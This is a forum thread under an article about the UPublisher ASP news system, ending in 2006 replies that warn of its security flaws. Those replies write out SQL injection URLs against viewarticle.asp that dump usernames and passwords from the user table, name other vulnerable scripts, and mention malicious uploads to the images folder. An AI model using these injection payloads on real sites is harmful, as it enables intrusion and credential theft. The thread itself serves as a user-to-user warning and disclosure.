Replies Back to Article

UPublisher | ASP News Publishing System for UD

web not working
September 14, 2001 by Jarek Bucholc
I found externat site is not working.
WAS Not Working, Is Now
September 14, 2001 by Super Freaker

Hey Jarke,

One of the problems with having a live demo is that people often feel inclined to try and break it and/or fill it with juvenile comments.

It should be all fixed now.

Shannon
team macromedia ultradev

RE: Superfreaker UPublisher SECURITY FLAWS
November 21, 2006 by West Chase

Please avoid using their UPublisher product .. and likely ALL superfreaker (a.k.a. superf**ked) products.

Do a Google search on "UPublisher exploit" to see the reason why.

http://www.milw0rm.com/exploits/2765

###http://[target]/[path]//viewarticle.asp?ID=[SQL]

Example:

\viewarticle.asp?ID=-1%20union%20select%200,password,username,0,0,0,0%20from%20tblusers
--- OR ---
\viewarticle.asp?ID=-1%20union%20select%200,0,username,password,0,0,0,0,0%20from%20tblusers

RE: RE: Superfreaker UPublisher SECURITY FLAWS
November 21, 2006 by West Chase

LOL - even Superfreaker's DEMO page was hacked:

http://www.superfreaker.com/UPublisher/demo/

RE: Superfreaker UPublisher SECURITY FLAWS
November 21, 2006 by West Chase

If your copy of UPublisher has been hacked, be CERTAIN to review / clean the uploads folder at:  /images/story_images/

In our case, the hacker was able to upload entire HTML pages ... and then reference them from their browser since they now knew the full URL to their HTML form!

Damn you, StupidFreaker

RE: Superfreaker UPublisher SECURITY FLAWS
November 26, 2006 by West Chase

In regard to the many articles on Google:

http://www.google.com/search?hl=en&q=upublisher+exploit 

Superfreaker's "UPublisher" exploit is NOT LIMITED to their "viewarticle.asp" script.

In fact, most of the product is vulnerable to SQL Injection attacks. Some other pages are "index.asp" and "preferences.asp".

Some other UPublisher scripts that CAN be hacked using the SAME METHOD you described above:

sendarticle.asp
printarticle.asp

# # # #